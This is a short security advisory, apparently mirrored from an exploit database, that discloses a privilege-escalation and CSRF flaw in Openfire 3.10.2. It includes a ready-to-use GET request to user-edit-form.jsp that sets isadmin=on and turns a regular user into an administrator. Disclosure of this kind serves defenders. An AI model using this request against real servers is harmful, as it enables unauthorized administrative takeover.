[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-PRIV-ESCALATION.txt Vendor: ================================ www.igniterealtime.org/projects/openfire www.igniterealtime.org/downloads/index.jsp Product: ================================ Openfire 3.10.2 Openfire is a real time collaboration (RTC) server licensed under the Open Source Apache License. It uses the only widely adopted open protocol for instant messaging, XMPP (also called Jabber). Vulnerability Type: =================== Privilege escalation CVE Reference: ============== N/A Vulnerability Details: ===================== No check is made when updating the user privileges, allowing regular user to become an admin. Escalation can be done remotely too if user is logged in as no CSRF token exist. Exploit code(s): =============== Become admin! http://localhost:9090/user-edit-form.jsp?username=hyp3rlinx&save=true&name=blasphemer&email=ghostofsin@abyss.com&isadmin=on Disclosure Timeline: ========================================================= Vendor Notification: NA Sept 14, 2015 : Public Disclosure Exploitation Technique: ======================= Local or Remote Severity Level: ========================================================= High Description: ========================================================== Request Method(s): [+] GET Vulnerable Product: [+] Openfire 3.10.2 Vulnerable Parameter(s): [+] isadmin Affected Area(s): [+] Admin =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx # Iranian Exploit DataBase = http://IeDb.Ir [2015-10-10]